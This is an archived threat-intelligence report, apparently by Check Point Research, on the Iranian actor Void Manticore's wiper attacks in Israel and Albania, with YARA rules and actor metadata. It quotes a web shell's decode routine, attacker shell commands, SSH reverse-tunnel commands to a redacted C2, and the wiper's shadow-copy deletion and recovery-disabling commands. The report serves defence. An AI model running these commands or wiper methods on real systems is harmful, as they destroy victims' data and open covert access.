{
	"id": "e0f5a287-b5de-4e12-8f07-20a95765c9b8",
	"created_at": "2026-04-15T02:22:53.730074Z",
	"updated_at": "2026-04-18T02:21:00.079807Z",
	"deleted_at": null,
	"sha1_hash": "ece80f47e5d165dd8d475fa43cf4ff7f95a90d4b",
	"title": "Bad Karma, No Justice: Void Manticore Destructive Activities in Israel",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 125609,
	"plain_text": "Bad Karma, No Justice: Void Manticore Destructive Activities in\r\nIsrael\r\nBy etal\r\nPublished: 2024-05-20 · Archived: 2026-04-15 02:00:42 UTC\r\nVoid Manticore is an Iranian threat actor affiliated with the Ministry of Intelligence and Security (MOIS).\r\nThey carry out destructive wiping attacks combined with influence operations.\r\nThe threat actor operates several online personas, with the most prominent among them being Homeland\r\nJustice for attacks in Albania and Karma for attacks carried out in Israel.\r\nThere are clear overlaps between the targets of Void Manticore and Scarred Manticore, with indications of\r\nsystematic hand off of targets between those two groups when deciding to conduct destructive activities\r\nagainst existing victims of Scarred Manticore.\r\nVoid Manticore utilizes five different methods to conduct disruptive operations against its victims. This\r\nincludes several custom wipers for both Windows and Linux, alongside manual deletion of files and shared\r\ndrives.\r\nIntroduction\r\nSince October 2023, Check Point Research (CPR) has actively monitored and hunted state-sponsored threats\r\ntargeting Israeli organizations with destructive attacks using wipers and ransomware. Among these threats, Void\r\nManticore (aka Storm-842) stands out as an Iranian threat actor known for conducting destructive attacks and\r\nleaking information through the online persona ’Karma’ (sometime written as KarMa).\r\nVoid Manticore’s activities extend beyond Israel, as the group has also executed attacks in Albania using the\r\npersona ’Homeland Justice’ to leak some of the collected data. 
In Israel, the group’s attacks are distinguished by the utilization of the custom BiBi wiper, named after Israeli Prime Minister Benjamin Netanyahu.\r\nOur analysis of Void Manticore’s intrusions and information leaks reveals a significant overlap in victimology with Scarred Manticore (aka Storm-0861), suggesting a collaboration between the two groups. In some instances we were able to identify a clear “handoff” procedure of victims from Scarred Manticore to Void Manticore. This phenomenon is evident in several cases involving victims in both Israel and Albania, indicating that cooperation between the threat actors extends beyond single operations or incidents.\r\nThe techniques, tactics, and procedures (TTPs) employed by Void Manticore are relatively straightforward and simple, involving hands-on efforts using basic, mostly publicly available tools. They often perform lateral movement using Remote Desktop Protocol (RDP) and typically deploy their wipers manually while conducting other manual deletion operations. The collaboration with Scarred Manticore, which appears to be a more sophisticated actor, has likely facilitated Void Manticore’s access to high-value targets.\r\nKarma Below 80\r\nhttps://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/\r\nPage 1 of 13\r\nIn light of the conflicts and rising tensions in the Middle East, a wide range of hack-and-leak personas have emerged targeting Israel. Initially, the group known as Karma didn’t stand out, as they were perceived as part of a much wider effort carried out by hacktivists and state-sponsored actors. 
However, the group began to garner more public attention when it was linked to the BiBi wiper, a custom wiper named after Israeli Prime Minister Benjamin Netanyahu.\r\nFigure 1 – A snippet from the Karmabelow80 website.\r\nKarma joined the arena with a Telegram channel soon after the Israel-Hamas war broke out and launched its website in November 2023. The website further established a fake persona of an anti-Zionist Jewish group (“Anti-Zionist Jewish Hackers”) that opposes the Israeli government and specifically Benjamin Netanyahu (Bibi). Karma claims to be a product of the “butterfly effect” spurred by the government’s military actions and therefore uses a butterfly icon as part of its symbol.\r\nSince its first appearance, the group claims to have successfully targeted over 40 Israeli organizations, including several high-value targets. According to their publications, the attacks involved wiping, stealing, and publishing the victims’ data.\r\nWhile analyzing the leaks from Karma, we observed a recurring pattern: overlaps between leaked information and the victims of Scarred Manticore, an Iranian actor CPR has been tracking for months. These overlaps prompted the team to further analyze the connection between Karma and Scarred Manticore. 
Our findings led us to the activities of another actor we refer to as Void Manticore, who likely operates the Karma persona and utilizes access previously obtained by Scarred Manticore.\r\n“One-Two Punch” – a Handoff Procedure\r\nIn addition to overlaps in the threat actors’ victims, our technical investigation detected an apparent handoff procedure between the attackers.\r\nIn the case of one victim, we discovered that after residing on the targeted network for over a year, Scarred Manticore was interacting with the infected machine at the exact moment a new web shell was dropped to disk. Following the shell’s deployment, a different set of IPs began accessing the network, suggesting the involvement of another actor – Void Manticore. The newly deployed web shell and subsequent tools were significantly less sophisticated than those in Scarred Manticore’s arsenal. However, they led to the deployment of the BiBi wiper, which is linked to Karma’s activity.\r\nOne of the first identified activities carried out by Void Manticore involved the use of a Domain Admin account. This suggests that the handoff process included more than just web shell deployments, but also access to additional information about the network.\r\nFigure 2 – A high-level timeline of the Void-Scarred Connection.\r\nFrom Albania to The Middle East\r\nThis handoff procedure is not unprecedented and is highly correlated with Microsoft’s reporting on the destructive attacks against Albania in 2022. In that incident, Storm-0861 (aka Scarred Manticore) was responsible for the initial access and data exfiltration, while Storm-0842 (aka Void Manticore) carried out the destructive attack. 
In this context, Karma’s activity closely resembles another persona linked to the actor by other vendors: Homeland Justice.\r\nFigure 3 – Homeland Justice utilizes politically charged messages.\r\nA comparison of the process that happened in Albania and in Israel is summarized in the table below:\r\n | Albania (2022) | Israel (2023-2024)\r\nActor #1 | Storm-0861 ~ Scarred Manticore\r\nActor #1 Initial Access | CVE-2019-0604 | CVE-2019-0604\r\nActor #1 Tools | Foxshell | Liontail\r\nActor #1 Access Time | Over a year | Over a year\r\nActor #1 Objective | Email Exfiltration | Email Exfiltration (LionHead)\r\nActor #2 | Storm-0842 ~ Void Manticore\r\nActor #2 Initial Access | Provided by Actor #1 | Provided by Actor #1\r\nActor #2 Objective | Wiper (CL Wiper) + Ransomware | Wiper (BiBi Wiper)\r\nLeaking Persona | Homeland Justice | Karma\r\nThe overlaps in techniques employed in attacks against Israel and Albania, including the coordination between the two different actors, suggest this process has become routine. The ties between the events in Israel and Albania have strengthened with the latest attacks against Albania (late 2023 and early 2024), during which Void Manticore dropped partition wipers similar to those used in Israel as part of the BiBi wiper attacks.\r\nTechniques, Tactics, and Procedures\r\nVoid Manticore’s TTPs are straightforward and aligned with their goal of quick and dirty destructive operations.\r\nIn some instances, Void Manticore’s access was established through an internet-facing web server, on which the group utilized various web shells. Among those was “Karma Shell”, which appears to be a homebrew tool. While masquerading as an error page (based on the page’s title and content), this tool can perform several functions. It can list directories, create processes, upload files, and start/stop/list services. 
Additionally, it employs base64 and a one-byte XOR to decrypt the supplied parameters.\r\n// One-Byte XOR Decryption of received argument\r\nprivate string decode_str(string source)\r\n{\r\n    return System.Text.Encoding.UTF8.GetString(decode(source));\r\n}\r\nprivate byte[] decode(string source)\r\n{\r\n    // base64-decode the request parameter, then XOR every byte with the fixed key 23 (0x17)\r\n    byte[] data = Convert.FromBase64String(source);\r\n    for (byte i = 0; i \u003c data.Length; i++)\r\n        data[i] ^= 23;\r\n    return data;\r\n}\r\nFigure 4 – Snippet from Karma Shell.\r\nAs we monitored the activity of the group’s interaction with “Karma Shell”, we retrieved some of the commands executed by the attacker on the compromised server.\r\n# | parameter | argument\r\n1 | run_command | c:\\windows\\system32\\cmd.exe /c echo %userprofile%\r\n2 | upload_file | C:\\ProgramData\\a.txt\r\n3 | run_command | c:\\windows\\system32\\cmd.exe /c ping.exe -n 1 4.2.2.4\r\n4 | run_command | c:\\windows\\system32\\cmd.exe /c ping.exe -n 1 microsoft.com\r\n5 | 
run_command | c:\\windows\\system32\\cmd.exe /c net user REDACTED_USERNAME /domain\r\n6 | upload_file | C:\\ProgramData\\REDACTED_NAME_WEBSHELL_reGeorge\r\n7 | upload_file | C:\\ProgramData\\do.zip\r\n8 | run_command | C:\\windows\\system32\\cmd.exe /c “C:\\Program Files\\WinRAR\\WinRAR.exe” x -o+ C:\\ProgramData\\do.zip *.* C:\\ProgramData\r\n9 | run_command | C:\\windows\\system32\\cmd.exe /c C:\\Programdata\\do.exe\r\nOne notable activity we observed in Void Manticore is the uploading of a tailor-made executable file, do.exe. This file checks authentication for Domain Admin credentials. If the authentication is successful, the executable copies another web shell, the publicly available reGeorge, to the web directory, indicating the credentials are valid. Using a binary with hard-coded Domain Admin credentials strengthens the assumption that the access was handed off to the group by another entity.\r\nFigure 5 – “Do.exe” with hard-coded credentials of Domain Admin.\r\nAfter deploying the reGeorge tunneling web shell, the actor continues to move laterally using RDP and collects information about target networks using Sysinternals’ AD Explorer. On some of those hosts, the threat actor establishes a C2 channel using an OpenSSH client. 
This is executed in the following manner, setting up a SOCKS proxy from compromised hosts:\r\nssh root@REDACTED_C2_SERVER -R 1090 -p 443 -o ServerAliveInterval=60\r\nssh root@REDACTED_C2_SERVER -R 1080 -p 443 -o ServerAliveInterval=60\r\nFigure 6 – Void Manticore SSH client executions.\r\nIn all the cases we observed targeting Israel in the last months, the access was later utilized to execute destructive activities, either with custom automated payloads or manual data destruction procedures.\r\nWipers\r\nVoid Manticore utilizes a set of custom wipers in their attacks.\r\nSome of Void Manticore’s wipers target and destroy the files themselves, corrupting specific files or file types within the infected systems. This approach allows the malware to selectively erase critical information, causing targeted damage to applications, user data, and system functionality.\r\nThe other wipers attack the system’s partition table. Instead of deleting individual files, these wipers obliterate the partition table, the component that stores the layout of the disk, including the partitions where files are organized. By destroying the partition table, the malware essentially removes the map that the operating system uses to locate and access data. 
As a result, all data on the disk becomes inaccessible, even though the data itself remains unaltered on the storage medium.\r\nCl Wiper\r\nCl Wiper is the first wiper used by the group in the first attack against Albania in July 2022, the details of which were published by CISA.\r\nHow it works: cl.exe gets arguments from the command line and uses a legitimate driver by ElRawDisk, called rwdsk.sys. The use of ElRawDisk is relatively common among wipers and has been previously used by several wiper families, some of them associated with Iranian actors. Additionally, the license key used in the wiper is the same as the one used in the ZeroCleare wiper, which is known to be used by several actors with links to MOIS. ElRawDisk enables interaction with files, disks, and partitions, proxying the wiping procedures and allowing raw access to the disk.\r\nThe cl wiper supports three commands:\r\nin – Installs rwdsk.sys as a service named RawDisk3 and loads it.\r\nun – Uninstalls the RawDisk3 service.\r\nwp – Accesses rwdsk.sys for wiping with the IOCTLs 0x227F80 or 0x22BF84, depending on the Windows version. These IOCTLs overwrite the contents of the physical drive with a predefined buffer. The Cl Wiper buffer is filled with ‘0’ characters.\r\nFigure 7 – Cl Wiper main method and supported arguments.\r\nPartition Wipers\r\nSome of Void Manticore’s wipers are pretty straightforward, performing only one function: they iterate over the available physical disks and then send an IOCTL (input/output control) named IOCTL_DISK_DELETE_DRIVE_LAYOUT (0x7c100).\r\nThis IOCTL removes partition information from the disk. If the partition style of the disk is Master Boot Record (MBR), it removes the signatures of the relevant drive from the partition table. 
If the partition style of the disk is GUID Partition Table (GPT), it wipes clean both the primary partition table header in sector 1 and the backup partition table in the last sector of the disk. As a result, it triggers a blue screen of death (BSOD) and the system crashes during reboot due to a corrupted partition table, which no longer holds any information on which offsets each partition resides on the disk.\r\nIn the attacks against Albania in December 2023, the wiper was internally called LowEraser based on its PDB path (also called the No-Justice Wiper by ClearSky). This file was signed by Attest Inspection Limited, and the icon of the file matches the logo on the company website.\r\nVoid Manticore also used this type of wiper in attacks against Albanian entities such as INSTAT, where the tool was called Pinky based on its PDB path, and in the attacks against Israeli entities, where it was internally called JustMBR.\r\nFigure 8 – Partition Wipers’ main logic.\r\nThere are minor differences between the variants of this wiper, such as debug strings that appear only in some of them.\r\nBiBi Wiper\r\nIn their most recent attacks, Void Manticore used a custom wiper called the BiBi wiper, referencing the nickname of Israel’s prime minister, Benjamin Netanyahu. The wiper was deployed in several campaigns against multiple entities in Israel and has variants for both Linux and Windows.\r\nLinux Version\r\nOn October 30, 2023, Security Joes published research about a new wiper used against Israeli companies during the Israel-Hamas war. The file name of this wiper was bibi-linux.out, and the extension of the wiped files was “.BiBi”.\r\nBiBi Wiper can receive command-line parameters such as the target_path (which is “/” by default). 
The wiper uses several threads, based on the number of CPU cores, for the wiping process and employs a queue to synchronize between them. It then corrupts the files with buffers of random data and renames the infected files with random names and the “.BiBi” extension ([RANDOM_NAME].BiBi[NUMBER]).\r\nInterestingly, BiBi Wiper doesn’t infect files with the extensions “.out” and “.so”, likely because it relies on files with those extensions (like bibi-linux.out) and other libraries essential for the OS and to keep the process running.\r\nWindows Version\r\nA Windows variant of the wiper, also named bibi.exe, was found several days later, exhibiting a similar flow. The wiper works with several threads based on the number of processors and avoids destroying files important to its operations (the Windows variant doesn’t destroy .exe, .dll and .sys files). The Windows variant also gets arguments such as the target_path, with a default value set to C:\\\\Users.\r\nThere are several differences between the Linux variant and the Windows variant:\r\nIn the Windows variant, the extension for the wiped files is “.BiBi\u003cnumber from 1 to 5\u003e”.\r\nThe Windows variant deletes shadow copies from the system with the commands:\r\ncmd.exe /c vssadmin delete shadows /quIet /all\r\ncmd.exe /c wmic shadowcopy delete\r\nThe Windows variant disables the system’s trigger to call the Error Recovery screen on startup with the command cmd.exe / c bcdedit / set {default} bootstatuspolicy ignoreallfailures and then turns it off with the command cmd.exe /c bcdedit /set {default} recoveryenabled no.\r\nAll the command strings are stored in reverse.\r\nFigure 9 – cmd.exe commands are stored backwards.\r\nIn February 2024, we found other variants of the wiper, which are more targeted than the earlier versions.\r\nThey enter the main flow only if the string “Israel” is not equal to 
the string “Country”:\r\nFigure 10 – The malware authors seemingly mock the victims.\r\nOne of the new samples lacks the features to delete the shadow copies and disable the Error Recovery.\r\nThe new samples have a different extension for the files, “.bb\u003crandom_number\u003e”. This is probably to avoid security solutions that signed the former extension.\r\nThe new samples have the same ability as the partition wipers to remove partition information from the disk.\r\nFigure 11 – The same code in both partition wipers and the BiBi Wiper.\r\nManual Data Destruction Activity\r\nIn addition to deploying custom wipers, the group singles out victims for manual data-destruction activities using “seemingly” legitimate utilities:\r\nFile Deletion via Windows Explorer: Void Manticore achieved data destruction on hosts by deleting files via the Windows File Explorer.\r\nSysinternals SDelete: Void Manticore also used SDelete to conduct secure data wiping manually.\r\nWindows Format Utility: The actors often utilized the Windows Format utility to corrupt the partition using the “Quick Format” option. It was also used to perform a “Full” format that corrupted the partition and its content.\r\nFigure 12 – Windows Format Utility.\r\nConclusion\r\nThis article provides an in-depth analysis of the attacks carried out by Void Manticore, an Iranian threat actor that targets Israeli organizations as part of a broader Iranian offensive strategy. Void Manticore’s operations are characterized by their dual approach, combining psychological warfare with actual data destruction. 
This is achieved through their use of wiping attacks and by publicly leaking information, thereby amplifying the destruction on the targeted organizations.\r\nVoid Manticore’s use of distinct online personas, notably “Homeland Justice” and “Karma,” plays a significant role in their strategy. The personas allow them to tailor their messaging in an attempt to effectively weaponize political tensions. The deployment of the custom BiBi wiper in their operations against Israeli targets showcases their intent not only to cause direct damage but also to send a politically charged message.\r\nThe collaboration between Void Manticore and Scarred Manticore reveals a high degree of coordination within their operations. The documented handoff procedures between these groups suggest a consistent level of planning and allow Void Manticore access to a wider set of targets, facilitated by their counterparts’ advanced capabilities. This cooperation positions Void Manticore as an exceptionally dangerous actor within the Iranian threat landscape.\r\nCheck Point Customers Remain Protected\r\nCheck Point customers remain protected against the attacks detailed in this report while using IPS, Check Point Harmony Endpoint and Threat Emulation.\r\nIPS:\r\nBackdoor.WIN32.Liontail.A/B\r\nThreat Emulation:\r\nAPT.Wins.Liontail.C/D\r\nAPT.Wins.VoidManticore.ta.A-H\r\nAPT.Wins.ScarredManticore.ta.A/B\r\nHarmony Endpoint:\r\nRansomware.Win.BiBiWiper.A-F\r\nRansomware_Linux_Bibi_B, Ransomware_Linux_Bibi_D\r\nIndicators of 
Compromise\r\nYara Rules\r\nrule APT_IR_VoidManticore_JustMbr\r\n{\r\n    meta:\r\n        description = \"A wiper destroying the MBR partition table used by VoidManticore\"\r\n        hash = \"cc77e8ab73b577de1924e2f7a93bcfd852b3c96c6546229bc8b80bf3fd7bf24e\"\r\n    strings:\r\n        $rich_header = {7B 20 15 F1 3F 41 7B A2 3F 41 7B A2 3F 41 7B A2}\r\n        $format_string = \"DiskHandle: %d, Wiped: %d, Error: %d\"\r\n        $physical_drive = {5C 5C 2E 5C 50 68 79 73 69 63 61 6C 44 72 69 76 65 25 64 00}\r\n        $ioctl_code = {BA 00 C1 07 00 48 ?? ?? ?? ?? 48 8B CF}\r\n    condition:\r\n        $rich_header or $format_string or ($physical_drive and $ioctl_code)\r\n}\r\nrule APT_IR_VoidManticore_BibiWiper\r\n{\r\n    meta:\r\n        description = \"A wiper used by VoidManticore having BB extensions\"\r\n        hash = \"40417e937cd244b2f928150cae6fa0eff5551fdb401ea072f6ecdda67a747e17\"\r\n    strings:\r\n        $commands_1 = \"lla/ teIuq/ swodahs eteled nimdassv c/ exe.dmc\" ascii\r\n        $commands_2 = \"eteled ypocwodahs cimw c/ exe.dmc\" ascii\r\n        $commands_3 = \"seruliafllaerongi ycilopsutatstoob }tluafed{ tes / tidedcb c / exe.dmc\" ascii\r\n        $commands_4 = \"on delbaneyrevocer }tluafed{ tes/ tidedcb c/ exe.dmc\" ascii\r\n        $string_stats = \"[+] Stats: %d | %d\"\r\n        $string_cpucores = \"[+] CPU cores: %d, Threads: %d\"\r\n        $string_cpucores_2 = \"[+] CPU: %d , Threads: %d\"\r\n        $string_diskname = \"DiskName: %s, Deleted: %d - %d\"\r\n        $string_waiting_queue = \"[!] Waiting For Queue \"\r\n    condition:\r\n        uint16(0) == 0x5A4D and\r\n        uint32(uint32(0x3C)) == 0x00004550 and\r\n        (3 of ($commands_*) or any of ($string_*))\r\n}\r\nSource: https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/"
	],
	"report_names": [
		"bad-karma-no-justice-void-manticore-destructive-activities-in-israel"
	],
	"threat_actors": [
		{
			"id": "9df96153-0450-4cbb-8a13-b737f16394ef",
			"created_at": "2023-11-03T02:00:07.788769Z",
			"updated_at": "2026-04-18T02:00:03.67814Z",
			"deleted_at": null,
			"main_name": "Scarred Manticore",
			"aliases": [],
			"source_name": "MISPGALAXY:Scarred Manticore",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "92c0dae2-e255-4b90-8d8f-be88e393ab8d",
			"created_at": "2022-10-25T16:07:24.402328Z",
			"updated_at": "2026-04-18T02:00:05.345906Z",
			"deleted_at": null,
			"main_name": "Wild Neutron",
			"aliases": [
				"Butterfly",
				"Morpho",
				"Sphinx Moth",
				"The Postal Group",
				"Wild Neutron"
			],
			"source_name": "ETDA:Wild Neutron",
			"tools": [
				"HesperBot",
				"Jiripbot",
				"JripBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "72fea432-77a6-437a-b02d-693e99d81ef9",
			"created_at": "2024-02-17T02:00:03.861221Z",
			"updated_at": "2026-04-18T02:00:03.91247Z",
			"deleted_at": null,
			"main_name": "BANISHED KITTEN",
			"aliases": [
				"Storm-0842",
				"Red Sandstorm"
			],
			"source_name": "MISPGALAXY:BANISHED KITTEN",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "13e58cc3-9acc-4564-8f84-b8cc0082ee4a",
			"created_at": "2024-05-23T02:00:03.982213Z",
			"updated_at": "2026-04-18T02:00:03.958281Z",
			"deleted_at": null,
			"main_name": "Void Manticore",
			"aliases": [],
			"source_name": "MISPGALAXY:Void Manticore",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7f25e108-e694-49b6-a494-c8458b33eb3f",
			"created_at": "2024-01-09T02:00:04.199217Z",
			"updated_at": "2026-04-18T02:00:03.846222Z",
			"deleted_at": null,
			"main_name": "HomeLand Justice",
			"aliases": [],
			"source_name": "MISPGALAXY:HomeLand Justice",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20c759c2-cd02-45bb-85c6-41bde9e6a7cf",
			"created_at": "2024-01-18T02:02:34.189827Z",
			"updated_at": "2026-04-18T02:00:05.080342Z",
			"deleted_at": null,
			"main_name": "HomeLand Justice",
			"aliases": [
				"Banished Kitten",
				"Karma",
				"Red Sandstorm",
				"Storm-0842",
				"Void Manticore"
			],
			"source_name": "ETDA:HomeLand Justice",
			"tools": [
				"BABYWIPER",
				"BiBi Wiper",
				"BiBi-Linux Wiper",
				"BiBi-Windows Wiper",
				"Cl Wiper",
				"LowEraser",
				"No-Justice Wiper",
				"Plink",
				"PuTTY Link",
				"RevSocks",
				"W2K Res Kit"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b3ebf51d-8f64-48a9-bbfb-674db872cccb",
			"created_at": "2025-08-07T02:03:24.769383Z",
			"updated_at": "2026-04-18T02:00:04.810428Z",
			"deleted_at": null,
			"main_name": "COBALT MYSTIQUE",
			"aliases": [
				"Banished Kitten ",
				"DEV-0842 ",
				"Druidfly ",
				"Handala Hack Team",
				"Homeland Justice",
				"Karmabelow80",
				"Red Sandstorm ",
				"Storm-0842 ",
				"Void Manticore "
			],
			"source_name": "Secureworks:COBALT MYSTIQUE",
			"tools": [
				"AllinOneNeo",
				"Bibi",
				"GramPy",
				"GramPyLoader"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-18T02:00:05.155941Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1776219773,
	"ts_updated_at": 1776478860,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ece80f47e5d165dd8d475fa43cf4ff7f95a90d4b.pdf",
		"text": "https://archive.orkl.eu/ece80f47e5d165dd8d475fa43cf4ff7f95a90d4b.txt",
		"img": "https://archive.orkl.eu/ece80f47e5d165dd8d475fa43cf4ff7f95a90d4b.jpg"
	}
}